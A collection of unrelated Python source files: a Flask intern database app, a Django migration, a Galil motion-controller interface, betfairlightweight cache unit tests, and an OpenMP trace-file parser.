redirect(url_for('show_all_positions')) @app.route('/interns') def show_all_interns(): """ This leads user to the position page when user clicks on the interns button on the top right and it is supposed to show user all the interns in the database """ db=main() conn = create_connection(db) mycur = conn.cursor() interns = mycur.execute("SELECT * FROM interns") return render_template('intern-all.html', interns=interns) @app.route('/intern/add', methods=['GET', 'POST']) def add_interns(): """ This leads user to the position adding page when user clicks on the add interns button it is supposed to let user enter and add new interns into the database """ if request.method == 'GET': db=main() conn = create_connection(db) mycur = conn.cursor() positions=mycur.execute("SELECT * FROM positions") return render_template('intern-add.html', positions=positions) if request.method == 'POST': # get data from the form db=main() conn = create_connection(db) mycur = conn.cursor() positions=mycur.execute("SELECT * FROM positions") last_name=request.form['last_name'] first_name = request.form['first_name'] position_applied = request.form['position_applied'] school = request.form['school'] program = request.form['program'] position = positions.query.filter_by(name=position_applied).first() intern = (last_name, first_name, position, school, program, datetime.datetime.now()) create_intern(conn,intern) # insert the data into the database #db.session.add(intern) #db.session.commit() return redirect(url_for('show_all_interns')) if __name__ == '__main__': main() #app.run() <reponame>erickgnavar/mozio-test # Generated by Django 2.0.4 on 2018-04-23 07:55 import django.contrib.gis.db.models.fields from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import model_utils.fields class Migration(migrations.Migration): initial = True dependencies = [ ('providers', '0001_initial'), ] operations = [ migrations.CreateModel( name='ServiceArea', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')), ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')), ('name', models.CharField(max_length=50, verbose_name='Name')), ('price', models.DecimalField(decimal_places=2, max_digits=8, verbose_name='Price')), ('polygon', django.contrib.gis.db.models.fields.PolygonField(srid=4326, verbose_name='Polygon')), ('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_areas', to='providers.Provider')), ], options={ 'verbose_name': 'Service Area', 'verbose_name_plural': 'Service Areas', 'default_related_name': 'service_areas', }, ), ] <filename>pypi_check/__init__.py from __future__ import absolute_import from .pypi import main <reponame>crigroup/galilmc #!/usr/bin/env python import enum import gclib import string import threading import collections import numpy as np _EPS = np.finfo(float).eps class ControlMode(enum.Enum): NONE = 1 JOG = 2 POSITION_TRACKING = 3 class GalilHardwareInterface(object): def __init__(self): # Default values self._reset() # Instance of the gclib python class self.g = gclib.py() self.mutex = threading.Lock() def _reset(self): self.num_axes = -1 self.connected = False self.mode = dict() def connect(self, address, subscribe, direct=True): """ Connect to a Galil Controller. Parameters ---------- address: str Simple address to hardware. It can be IP address, PCI, COM port subscribe: str or :class:`SubscribeType` Subscribe to messages, data records, and/or interrupts direct: bool, optional Connect directly to hardware instead of via gcaps Returns ------- cmd: str The string sent to the controller using `GOpen` """ cmd = address if direct: cmd += ' --direct' if isinstance(subscribe, str): cmd += ' -s {}'.format(subscribe) elif isinstance(subscribe, SubscribeType): cmd += ' -s {}'.format(subscribe.name) try: with self.mutex: self.g.GOpen(cmd) # Report we managed to connect and get the number of axes self.connected = True self.num_axes = len(self.send_command('TP*=?').split(',')) for i in range(self.num_axes): axis = string.ascii_uppercase[i] self.mode[axis] = ControlMode.NONE except gclib.GclibError as e: self._reset() return cmd def disconnect(self): self._reset() try: with self.mutex: self.g.GClose() success = True except gclib.GclibError: success = False return success def get_position(self, axis): if not self.connected: return None axis = axis.upper() try: position = float(self.send_command('TP{}'.format(axis))) except (gclib.GclibError, ValueError): position = None return position def get_position_error(self, axis): if not self.connected: return None axis = axis.upper() try: position_error = float(self.send_command('TE{}'.format(axis))) except (gclib.GclibError, ValueError): position_error = None return position_error def get_velocity(self, axis): if not self.connected: return None axis = axis.upper() try: velocity = float(self.send_command('TV{}'.format(axis))) except (gclib.GclibError, ValueError): velocity = None return velocity def get_torque(self, axis): if not self.connected: return None axis = axis.upper() try: torque = float(self.send_command('TT{}'.format(axis))) except (gclib.GclibError, ValueError): torque = None return torque def jog(self, axis, counts_per_sec): """ Parameters ---------- axis: str Letter that identifies the axis (A, B, C, etc) counts_per_sec: int The target jog speed of the axis. The units of this are [counts/second]. """ axis = axis.upper() if axis not in self.mode.keys(): raise ValueError('Jog command received invalid axis') # Check the control mode is valid if self.mode[axis] == ControlMode.NONE: self.mode[axis] = ControlMode.JOG elif self.mode[axis] != ControlMode.JOG: raise TypeError('Cannot process jog command. Invalid control mode') # Process the command if self.is_moving(axis): self.send_command('JG{}'.format(axis), int(counts_per_sec)) else: self.send_command('SH{}'.format(axis)) self.send_command('JG{}'.format(axis), int(counts_per_sec)) self.send_command('BG{}'.format(axis)) def is_connected(self): return self.connected def is_moving(self, axis): axis = axis.upper() try: res = float(self.send_command('MG _BG{}'.format(axis))) except gclib.GclibError: res = 0. return res > _EPS def is_valid_axis(self, axis): is_valid = False axis = axis.upper() if axis in string.ascii_uppercase: is_valid = string.ascii_uppercase.index(axis) < self.num_axes return is_valid def position_tracking(self, axis, counts, counts_per_sec): """ Parameters ---------- axis: str Letter that identifies the axis (A, B, C, etc) counts: int The absolute position target. The units of this are [counts]. counts_per_sec: int The target speed of the axis. The units of this are [counts/second]. """ axis = axis.upper() if axis not in self.mode.keys(): raise ValueError('Position command received invalid axis') # Check the control mode is valid if self.mode[axis] == ControlMode.NONE: self.mode[axis] = ControlMode.POSITION_TRACKING # Change the coordinate system and enable the servo control self.send_command('SH{}'.format(axis)) self.send_command('BG{}'.format(axis)) # Enable position tracking self.send_command('DP{}'.format(axis), 0) # Zero the absolute position self.send_command('PT{}'.format(axis), 1) # Start PT mode elif self.mode[axis] != ControlMode.POSITION_TRACKING: raise TypeError('Cannot process position command. Invalid control mode') # Process the command self.send_command('SP{}'.format(axis), int(counts_per_sec)) self.send_command('PA{}'.format(axis), int(counts)) def send_command(self, key, value=None): cmd = key if isinstance(value, (int, float, basestring)): cmd += ' = ' + str(value) elif isinstance(value, collections.Sequence): cmd += ' = ' + ', '.join(map(str,value)) elif value is not None: raise TypeError('Unsupported value type: {}'.format(type(value))) try: with self.mutex: res = self.g.GCommand(cmd) except gclib.GclibError: res = None return res def stop(self, axis=None): success = False if self.connected: if axis is None: res = self.send_command('ST') success = res is not None elif self.is_valid_axis(axis): axis = axis.upper() res = self.send_command('ST{}'.format(axis)) success = res is not None # Reset control mode if success: if axis is None: axes = self.mode.keys() elif self.is_valid_axis(axis): axes = [axis] for a in axes: self.mode[a.upper()] = ControlMode.NONE return success def turn_off(self, axis=None): """ Turn off the specified motor. If `axis=None`, turn off all the motors Parameters ---------- axis: str Uppercase letter that identifies the axis (A, B, C, etc) Returns ------- success: bool True if succeeded, False otherwise. Notes ----- This command attempts to stop the axes before turning then off. This is because a `MO` command will fail if the axis is moving """ success = False if self.connected: self.stop(axis) if axis is None: res = self.send_command('MO') success = res is not None elif self.is_valid_axis(axis): axis = axis.upper() res = self.send_command('MO{}'.format(axis)) success = res is not None return success class SubscribeType(enum.Enum): """ Flag to indicate whether to subscribe to messages, data records, and/or interrupts """ NONE = 1 MG = 2 DR = 3 EI = 4 ALL = 5 if __name__ == '__main__': # Simple usage example from galilmc import GalilHardwareInterface interface = GalilHardwareInterface() cmd = interface.connect('192.168.0.41', subscribe='ALL', direct=False) if not interface.is_connected(): raise Exception('Failed to connect to the galilmc: {}'.format(cmd)) # Setup interface.send_command('AUA', 1) interface.send_command('AGA', 2) interface.send_command('TLA', 7) interface.send_command('CEA', 3) interface.send_command('MTA', -1) interface.send_command('BRA', 0) interface.send_command('ACA', 15432704) interface.send_command('DCA', 15432704) interface.send_command('ERA', 2500) interface.send_command('OEA', 0) interface.send_command('KPA', 6) # Low gain to avoid overshooting interface.send_command('KDA', 64) # Test the position tracking rpm = 1400 encoder_ppr = 2500 depth = 8e-3 pitch = 0.8e-3 counts = (depth / pitch) * encoder_ppr counts_per_sec = rpm * encoder_ppr / 60. interface.position_tracking('A', counts, counts_per_sec) # Clean-up interface.turn_off() interface.disconnect() <reponame>zahraaliaghazadeh/python # Get input. word1 = input("Enter word #1: ") word2 = input("Enter word #2: ") # code here # assigning vairables and swapping thr values temp = word1 word1 = word2 word2 = temp # Print results. print () # prints blank line print("Swapping results") print("word #1:", word1) print("word #2:", word2) # run the code by python3 swap.py<gh_stars>1-10 import datetime import unittest from betfairlightweight.resources.baseresource import BaseResource from betfairlightweight.streaming.cache import ( OrderBookCache, OrderBookRunner, UnmatchedOrder, MarketBookCache, RunnerBook, Available, ) from betfairlightweight.exceptions import CacheError from tests import mock from tests.unit.tools import create_mock_json class TestAvailable(unittest.TestCase): def setUp(self): self.prices = [[1, 1.02, 34.45], [0, 1.01, 12]] self.available = Available(self.prices, 2) def test_init(self): assert self.available.prices == self.prices assert self.available.deletion_select == 2 assert self.available.reverse is False def test_sort(self): self.available.sort() assert self.available.prices == self.prices assert self.available.serialise == [{'price': 1.01, 'size': 12}, {'price': 1.02, 'size': 34.45}] def test_sort_short(self): current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] available = Available(current, 1) assert available.serialise == [ {'price': 1.02, 'size': 1157.21}, {'price': 13, 'size': 28.01}, {'price': 27, 'size': 0.95} ] def test_clear(self): self.available.clear() assert self.available.prices == [] def test_update_available_new_update(self): # [price, size] book_update = [[30, 6.9]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.02, 1157.21], [13, 28.01], [27, 0.95], [30, 6.9]] available = Available(current, 1) available.update(book_update) assert current == expected book_update = [[30, 6.9], [1.01, 12]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.01, 12], [1.02, 1157.21], [13, 28.01], [27, 0.95], [30, 6.9]] available = Available(current, 1) available.update(book_update) assert current == expected # [position, price, size] book_update = [[0, 36, 0.57]] current = [] expected = [[0, 36, 0.57]] available = Available(current, 2) available.update(book_update) assert available.prices == expected def test_update_available_new_replace(self): # [price, size] book_update = [[27, 6.9]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.02, 1157.21], [13, 28.01], [27, 6.9]] available = Available(current, 1) available.update(book_update) assert current == expected # [position, price, size] book_update = [[0, 36, 0.57]] current = [[0, 36, 10.57], [1, 38, 3.57]] expected = [[0, 36, 0.57], [1, 38, 3.57]] available = Available(current, 2) available.update(book_update) assert current == expected # tests handling of betfair bug, http://forum.bdp.betfair.com/showthread.php?t=3351 book_update = [[2, 0, 0], [1, 1.01, 9835.74], [0, 1.02, 1126.22]] current = [[1, 1.01, 9835.74], [0, 1.02, 1126.22]] expected = [[0, 1.02, 1126.22], [1, 1.01, 9835.74]] available = Available(current, 2) available.update(book_update) assert current == expected def test_update_available_new_remove(self): book_update = [[27, 0]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.02, 1157.21], [13, 28.01]] available = Available(current, 1) available.update(book_update) assert current == expected # [position, price, size] book_update = [[0, 36, 0], [1, 38, 0], [0, 38, 3.57]] current = [[0, 36, 10.57], [1, 38, 3.57]] expected = [[0, 38, 3.57]] available = Available(current, 2) available.update(book_update) assert current == expected class TestMarketBookCache(unittest.TestCase): def setUp(self): self.market_book_cache = MarketBookCache(**{'marketDefinition': {'runners': {}}}) def test_error(self): with self.assertRaises(CacheError): self.market_book_cache = MarketBookCache() @mock.patch('betfairlightweight.streaming.cache.MarketBookCache.strip_datetime') def test_update_cache_md(self, mock_strip_datetime): publish_time = mock.Mock() market_change = create_mock_json('tests/resources/streaming_mcm_UPDATE_md.json') book_data = market_change.json().get('mc') for book in book_data: self.market_book_cache.update_cache(book, publish_time) mock_strip_datetime.assert_called_with(publish_time) assert self.market_book_cache.market_definition == book.get('marketDefinition') @mock.patch('betfairlightweight.streaming.cache.MarketBookCache.strip_datetime') def test_update_cache_tv(self, mock_strip_datetime): publish_time = mock.Mock() market_change = create_mock_json('tests/resources/streaming_mcm_UPDATE_tv.json') book_data = market_change.json().get('mc') for book in book_data: self.market_book_cache.update_cache(book, publish_time) mock_strip_datetime.assert_called_with(publish_time) assert self.market_book_cache.total_matched == book.get('tv') # @mock.patch('betfairlightweight.resources.streamingresources.MarketBookCache.strip_datetime') # def test_update_cache_rc(self, mock_strip_datetime): # publish_time = mock.Mock() # market_change = create_mock_json('tests/resources/streaming_mcm_UPDATE.json') # book_data = market_change.json().get('mc') # # for book in book_data: # self.market_book_cache.update_cache(book, publish_time) # mock_strip_datetime.assert_called_with(publish_time) # # assert self.market_book_cache.total_matched == book.get('tv') @mock.patch('betfairlightweight.streaming.cache.MarketBookCache.serialise') @mock.patch('betfairlightweight.streaming.cache.MarketDefinition') @mock.patch('betfairlightweight.streaming.cache.MarketBook') def test_create_resource(self, mock_market_book, mock_market_definition, mock_serialise): # lightweight market_book = self.market_book_cache.create_resource(1234, {}, True) assert market_book == mock_serialise # not lightweight market_book = self.market_book_cache.create_resource(1234, {}, False) assert market_book == mock_market_book() def test_update_runner_dict(self): assert self.market_book_cache.runner_dict == {} class Runner: def __init__(self, selection_id, name, handicap): self.selection_id = selection_id self.name = name self.handicap = handicap (a, b) = (Runner(123, 'a', 1.25), Runner(456, 'b', -0.25)) self.market_book_cache.runners = [a, b] self.market_book_cache._update_runner_dict() assert self.market_book_cache.runner_dict == {(123, 1.25): a, (456, -0.25): b} def test_init_multiple_rc(self): # Initialize data with multiple rc entries for the same selection data = {'marketDefinition': {'runners': {}}} data['rc'] = [{'atb': [[1.01, 200]], 'id': 13536143}, {'atl': [[1000.0, 200]], 'id': 13536143}] market_book_cache = MarketBookCache(**data) assert len(market_book_cache.runners) == len(market_book_cache.runner_dict) class TestRunnerBook(unittest.TestCase): def setUp(self): self.runner_book = RunnerBook(**{'id': 123}) def test_update_traded(self): self.mock_traded = mock.Mock() self.runner_book.traded = self.mock_traded self.runner_book.update_traded([]) self.mock_traded.clear.assert_called_with() self.runner_book.update_traded([1, 2]) self.mock_traded.update.assert_called_with([1, 2]) def test_serialise_back(self): mock_available_to_back = mock.Mock() mock_available_to_back.prices = True mock_best_available_to_back = mock.Mock() mock_best_available_to_back.prices = True mock_best_display_available_to_back = mock.Mock() mock_best_display_available_to_back.prices = True self.runner_book.available_to_back = mock_available_to_back assert self.runner_book.serialise_available_to_back() == mock_available_to_back.serialise mock_available_to_back.prices = False self.runner_book.best_available_to_back = mock_best_available_to_back assert self.runner_book.serialise_available_to_back() == mock_best_available_to_back.serialise mock_best_available_to_back.prices = False self.runner_book.best_display_available_to_back = mock_best_display_available_to_back assert self.runner_book.serialise_available_to_back() == mock_best_display_available_to_back.serialise def test_serialise_lay(self): mock_available_to_lay = mock.Mock() mock_available_to_lay.prices = True mock_best_available_to_lay = mock.Mock() mock_best_available_to_lay.prices = True mock_best_display_available_to_lay = mock.Mock() mock_best_display_available_to_lay.prices = True self.runner_book.available_to_lay = mock_available_to_lay assert self.runner_book.serialise_available_to_lay() == mock_available_to_lay.serialise mock_available_to_lay.prices = False self.runner_book.best_available_to_lay = mock_best_available_to_lay assert self.runner_book.serialise_available_to_lay() == mock_best_available_to_lay.serialise mock_best_available_to_lay.prices = False self.runner_book.best_display_available_to_lay = mock_best_display_available_to_lay assert self.runner_book.serialise_available_to_lay() == mock_best_display_available_to_lay.serialise def test_empty_serialise(self): runner_definition = { 'bdp': None, } serialise_d = self.runner_book.serialise(runner_definition) ex = serialise_d['ex'] # all empty lists assert all(not ex[a] for a in ex.keys()) sp = serialise_d['sp'] # all 'None' or empty lists assert all(not sp[a] for a in sp.keys()) class TestOrderBookCache(unittest.TestCase): def setUp(self): self.order_book_cache = OrderBookCache(**{}) self.runner = mock.Mock() self.runner.selection_id = 10895629 self.runner.serialise_orders = mock.Mock(return_value=[]) self.order_book_cache.runners = [self.runner] def test_update_cache(self): mock_response = create_mock_json('tests/resources/streaming_ocm_UPDATE.json') for order_book in mock_response.json().get('oc'): self.order_book_cache.update_cache(order_book, 1234) for order_changes in order_book.get('orc'): # self.runner.matched_lays.update.assert_called_with(order_changes.get('ml', [])) # self.runner.matched_backs.update.assert_called_with(order_book.get('mb', [])) self.runner.update_unmatched.assert_called_with(order_changes.get('uo', [])) @mock.patch('betfairlightweight.streaming.cache.OrderBookRunner') def test_update_cache_new(self, mock_order_book_runner): self.runner.selection_id = 108956 mock_response = create_mock_json('tests/resources/streaming_ocm_UPDATE.json') for order_book in mock_response.json().get('oc'): self.order_book_cache.update_cache(order_book, 1234) for order_changes in order_book.get('orc'): mock_order_book_runner.assert_called_with(**order_changes) @mock.patch('betfairlightweight.streaming.cache.OrderBookCache.serialise') @mock.patch('betfairlightweight.streaming.cache.CurrentOrders') def test_create_resource(self, mock_current_orders, mock_serialise): current_orders = self.order_book_cache.create_resource(123, {}, False) assert current_orders == mock_current_orders() def test_runner_dict(self): class Runner: def __init__(self, selection_id, name): self.selection_id = selection_id self.name = name (a, b) = (Runner(123, 'a'), Runner(456, 'b')) self.order_book_cache.runners = [a, b] assert self.order_book_cache.runner_dict == {123: a, 456: b} def test_serialise(self): serialised = self.order_book_cache.serialise assert serialised == {'currentOrders': [], 'moreAvailable': False} class TestOrderBookRunner(unittest.TestCase): def setUp(self): self.order_book_runner = OrderBookRunner(**{'id': 1, 'ml': [], 'mb': [], 'uo': []}) class TestUnmatchedOrder(unittest.TestCase): def setUp(self): order = { 'id': 1, 'p': 2, 's': 3, 'side': 'L', 'status': 'E', 'pt': 'L', 'ot': 'L', 'pd': 8, 'sm': 9, 'sr': 10, 'sl': 11, 'sc': 12, 'sv': 13, 'rfo': 14, 'rfs': 15, 'ld': 16, 'lsrc': 17, 'error': 'test' } self.unmatched_order = UnmatchedOrder(**order) def test_init(self): assert self.unmatched_order.bet_id == 1 assert self.unmatched_order.price == 2 assert self.unmatched_order.size == 3 assert self.unmatched_order.side == 'L' assert self.unmatched_order.status == 'E' assert self.unmatched_order.persistence_type == 'L' assert self.unmatched_order.order_type == 'L' assert self.unmatched_order.placed_date == BaseResource.strip_datetime(8) assert self.unmatched_order.size_matched == 9 assert self.unmatched_order.size_remaining == 10 assert self.unmatched_order.size_lapsed == 11 assert self.unmatched_order.size_cancelled == 12 assert self.unmatched_order.size_voided == 13 assert self.unmatched_order.reference_order == 14 assert self.unmatched_order.reference_strategy == 15 assert self.unmatched_order.lapsed_date == 16 assert self.unmatched_order.lapse_status_reason_code == 17 def test_placed_date_string(self): now = datetime.datetime.now() self.unmatched_order.placed_date = now assert self.unmatched_order.placed_date_string == now.strftime('%Y-%m-%dT%H:%M:%S.%fZ') def test_matched_date_string(self): now = datetime.datetime.now() self.unmatched_order.matched_date = now assert self.unmatched_order.matched_date_string == now.strftime('%Y-%m-%dT%H:%M:%S.%fZ') def test_serialise(self): assert self.unmatched_order.serialise('1.23', 12345, 0.0) == { 'sizeLapsed': 11, 'persistenceType': 'LAPSE', 'sizeRemaining': 10, 'placedDate': '1970-01-01T00:00:00.008000Z', 'sizeVoided': 13, 'sizeCancelled': 12, 'betId': 1, 'customerOrderRef': 14, 'orderType': 'LIMIT', 'marketId': '1.23', 'matchedDate': None, 'side': 'LAY', 'selectionId': 12345, 'bspLiability': None, 'sizeMatched': 9, 'handicap': 0.0, 'averagePriceMatched': 0.0, 'status': 'EXECUTABLE', 'customerStrategyRef': 15, 'regulatorCode': None, 'priceSize': {'price': 2, 'size': 3} } __all__ = ["PHITag", "NameTag", "ProfessionTag", "LocationTag", "AgeTag", "DateTag", "ContactTag", "IDTag", "OtherTag", "StandoffAnnotation", "EvaluatePHI", "TokenSequence", "Token", "PHITokenSequence", "PHIToken", "evaluate", "get_predicate_function"] from tags import PHITag from tags import NameTag, ProfessionTag, LocationTag, AgeTag, DateTag from tags import ContactTag, IDTag, OtherTag from classes import StandoffAnnotation, EvaluatePHI from classes import TokenSequence, Token, PHITokenSequence, PHIToken from evaluate import evaluate, get_predicate_function from enum import Enum, auto from copy import copy from collections import defaultdict from PfgUtil import debug_mode import logging import time class EntityType(Enum): STACKFRAME = auto() SYNC_REGION = auto() TASK_REGION = auto() IMPLICIT_TASK_REGION = auto() THREAD = auto() TASK_PERIOD = auto() PARALLEL_REGION = auto() TASK_CREATION = auto() WORK = auto() """ Each construct that is extracted from the tracefile is an Entity An entity has a type, a CPU, a start and an end time, along with other type-specific information TODO this could perhaps be merged with the PFGTree data structures (e.g. PFGTreeNodeExecutionInterval) with some effort """ class Entity: def __init__(self, entity_type, identifier, cpu, start, end): self.entity_type = entity_type self.identifier = identifier # this is used differently depending on the type self.cpu = cpu self.start = start self.end = end self.depth = None self.group = None self.task_id = None self.parent_id = None self.pregion_num_threads = 0 # only used for parallel region type self.parallelism_intervals = defaultdict(int) self.per_cpu_intervals = defaultdict(int) self.per_cpu_top_of_stack_intervals = defaultdict(int) self.top_of_stack_parallelism_intervals = defaultdict(int) self.per_cpu_top_of_stack_parallelism_intervals = {} self.parent_entity = None self.child_entities = [] def add_parallelism_interval(self, parallelism, interval, cpu): self.per_cpu_intervals[cpu] += interval self.parallelism_intervals[parallelism] += interval def add_top_of_stack_interval(self, interval, cpu): self.per_cpu_top_of_stack_intervals[cpu] += interval def add_top_of_stack_parallelism_interval(self, parallelism, interval): self.top_of_stack_parallelism_intervals[parallelism+1] += interval # TODO what does this mean? each CPU has it's own top_of_stack parallelism interval? def add_per_cpu_top_of_stack_parallelism_interval(self, parallelism, interval, cpu): if cpu not in self.per_cpu_top_of_stack_parallelism_intervals: self.per_cpu_top_of_stack_parallelism_intervals[cpu] = defaultdict(int) self.per_cpu_top_of_stack_parallelism_intervals[cpu][parallelism+1] += interval import subprocess def file_len(fname): p = subprocess.Popen(['wc', '-l', fname], stdout=subprocess.PIPE, stderr=subprocess.PIPE) result, err = p.communicate() if p.returncode != 0: raise IOError(err) return int(result.strip().split()[0]) def parse_trace(filename): logging.debug("Parsing the tracefile %s.", filename) entries = [] exits = [] frames = set() tasks = {} unique_groups = set() max_depth = 0 max_cpu = -1 main_cpu = -1 min_timestamp = -1 max_timestamp = -1 num_lines = file_len(filename) with open(filename, 'r') as f: line_idx = -1 for line in f: line_idx += 1 if line.strip() == "": continue if line_idx % int(num_lines/10.0) == 0: logging.debug("Parsed line %d of %d.", line_idx+1, num_lines) split_line = line.strip().split(",") cpu = int(split_line[1]) if cpu > max_cpu: max_cpu = cpu if split_line[0] == "period": # i.e. stack frame period! period_start = int(split_line[2]) period_end = int(split_line[3]) frame_id = split_line[4] parent_frame_id = split_line[5] frame_start = int(split_line[6]) frame_end = int(split_line[7]) if min_timestamp == -1 or frame_start < min_timestamp: min_timestamp = frame_start if max_timestamp == -1 or frame_end > max_timestamp: max_timestamp = frame_end depth = int(split_line[8]) symbol = ",".join(split_line[9:]) # ignoring openmp outlining function calls if "outlined" in symbol: continue if "main" in symbol and main_cpu == -1: main_cpu = cpu if symbol not in unique_groups: unique_groups.add(symbol) if frame_id in frames: # This is a period of a frame we've seen before, for now I can just ignore it pass else: # This is a period of a new frame! frames.add(frame_id) stack_frame = Entity(EntityType.STACKFRAME, frame_id, cpu, frame_start, frame_end) stack_frame.depth = depth stack_frame.group = symbol stack_frame.parent_id = parent_frame_id entries.append(stack_frame) exits.append(stack_frame) elif split_line[0] == "task_creation": continue # currently ignoring symbol_addr = int(split_line[3]) parent_task_id = int(split_line[4]) new_task_id = int(split_line[5]) timestamp = int(split_line[2]) tcreate = Entity(EntityType.TASK_CREATION, new_task_id, cpu, timestamp, 0) tcreate.group = symbol_addr tcreate.parent_id = parent_task_id entries.append(tcreate) elif split_line[0] == "parallel_region": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) start = int(split_line[2]) end = int(split_line[3]) num_threads = int(split_line[4]) pregion = Entity(EntityType.PARALLEL_REGION, None, cpu, start, end) pregion.pregion_num_threads = num_threads entries.append(pregion) exits.append(pregion) elif split_line[0] == "task_period": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) task_id = split_line[2] period_start = int(split_line[5]) period_end = int(split_line[6]) start = int(split_line[3]) end = int(split_line[4]) prior_task_id = int(split_line[7]) # currently unused openmp_task_id = int(split_line[8]) if task_id in tasks: # This is a period of a frame we've seen before task_region = tasks[task_id] # create entry and exits task_period = Entity(EntityType.TASK_PERIOD, openmp_task_id, cpu, period_start, period_end) task_period.group = split_line[0] task_period.task_id = task_id entries.append(task_period) exits.append(task_period) else: task_region = Entity(EntityType.TASK_REGION, openmp_task_id, cpu, start, end+1) # add one cycle so we delete the task after we process its final period task_region.group = split_line[0] task_region.task_id = task_id tasks[task_id] = task_region entries.append(task_region) exits.append(task_region) # also make a period start/end for the first period of this task region task_period = Entity(EntityType.TASK_PERIOD, openmp_task_id, cpu, period_start, period_end) task_period.group = split_line[0] task_period.task_id = task_id task_period.parent_id = prior_task_id entries.append(task_period) exits.append(task_period) elif split_line[0] == "implicit_task": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) if "omp_forked_execution" not in unique_groups: unique_groups.add("omp_forked_execution") start = int(split_line[2]) end = int(split_line[3]) task_region = Entity(EntityType.IMPLICIT_TASK_REGION, None, cpu, start, end) task_region.group = split_line[0] entries.append(task_region) exits.append(task_region) elif split_line[0] == "sync_region": if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) start = int(split_line[2]) end = int(split_line[3]) sync_region = Entity(EntityType.SYNC_REGION, None, cpu, start, end) sync_region.group = split_line[0] entries.append(sync_region) exits.append(sync_region) elif split_line[0] == "thread": continue # currently ignoring if split_line[0] not in unique_groups: unique_groups.add(split_line[0]) start = int(split_line[2]) end = int(split_line[3]) thread = Entity(EntityType.THREAD, None, cpu, start, end) thread.group = split_line[0] entries.append(thread) exits.append(thread) elif split_line[0] == "work": if "omp_parallel_loop" not in unique_groups: unique_groups.add("omp_parallel_loop") start = int(split_line[2]) end = int(split_line[3]) work = Entity(EntityType.WORK, None, cpu, start, end) work.group = split_line[0] work.identifier = int(split_line[4]) # if 1 then it means it's a LOOP work callback work.count = int(split_line[5]) # number of threads in the work team entries.append(work) exits.append(work) else: logging.error("Cannot parse line: %s", line); raise ValueError() logging.debug("Sorting the entries and exits") entries.sort(key=lambda x: x.start) exits.sort(key=lambda x: x.end) logging.debug("Finished parsing the tracefile %s.", filename) return entries, exits, unique_groups, max_cpu, main_cpu, min_timestamp, max_timestamp def get_next_entity(entries, exits, entry_idx, exit_idx): is_exit = None next_entity = None if entry_idx >= len(entries) and exit_idx >= len(exits): return None, None, entry_idx, exit_idx elif entry_idx >= len(entries): is_exit = True # i.e. it is an exit next_entity = exits[exit_idx] exit_idx += 1 elif exit_idx >= len(exits): is_exit = False # i.e. it is an entry next_entity = entries[entry_idx] entry_idx += 1 else: # which one is first? next_entry = entries[entry_idx] next_exit = exits[exit_idx] if next_entry.start < next_exit.end: is_exit = False next_entity = next_entry entry_idx += 1 else: is_exit = True next_entity = exits[exit_idx] exit_idx += 1 return is_exit, next_entity, entry_idx, exit_idx def process_entry(entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, max_depth): if entity.entity_type == EntityType.STACKFRAME: # find the correct callstack and push this frame to it # once I have the correct callstack, I simply add this new one as a child of the top of the callstack logging.trace("%d:wanting to push:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] if len(call_stack) == 0: top_level_entities.append(entity) else: entity.parent_entity = call_stack[-1] call_stack[-1].child_entities.append(entity) call_stack.append(entity) if len(call_stack) > max_depth[0]: max_depth[0] = len(call_stack) logging.trace("%d:pushed to stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group,entity.entity_type, entity) elif entity.entity_type == EntityType.SYNC_REGION: # (swap this CPU's callstack to the runtime callstack?) # TODO runtime-time (or synchronisation-time) should be recorded separately to work-time for each entity pass elif entity.entity_type == EntityType.TASK_REGION: # do nothing, let the changes to CPU state happen on task period pass elif entity.entity_type == EntityType.TASK_PERIOD: # I need to swap this CPU's state to the callstack corresponding to the task instance entered_task_id = entity.identifier if entered_task_id not in saved_call_stacks: logging.error("Could not find the task id %d in the saved call stacks when I entered it.", entered_task_id) raise ValueError() current_call_stack_per_cpu[entity.cpu].append(entered_task_id) logging.trace("%d:created new stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) elif entity.entity_type == EntityType.WORK: if entity.identifier != 1: logging.error("Currently only support loop work-callbacks. Cannot handle the work type: %s", entity.identifier) raise NotImplementedError() # if this CPU is not in parallel execution mode (i.e. the CPU's callstack is 'init') # then this should create a separate callstack for this CPU call_stack = None if len(current_call_stack_per_cpu[entity.cpu]) == 0: call_stack = saved_call_stacks["init"] else: call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] # copy the current sequential call stack duplicate_call_stack = copy(call_stack) # create a CPU specific one so that CPU-specific callstacks are correctly handled nested_level = 0 for stack_name in current_call_stack_per_cpu[entity.cpu]: if "omp_thread_" in stack_name: nested_level += 1 saved_call_stacks["omp_thread_" + str(entity.cpu) + "_" + str(nested_level)] = duplicate_call_stack current_call_stack_per_cpu[entity.cpu].append("omp_thread_" + str(entity.cpu) + "_" + str(nested_level)) logging.trace("%d:created new stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) if nested_level == 0: # append this entity as a pseudo call entity.group = "omp_parallel_loop" stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] entity.parent_entity = stack[-1] stack[-1].child_entities.append(entity) stack.append(entity) if len(stack) > max_depth[0]: max_depth[0] = len(stack) logging.trace("%d:pushed new loop work to stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, 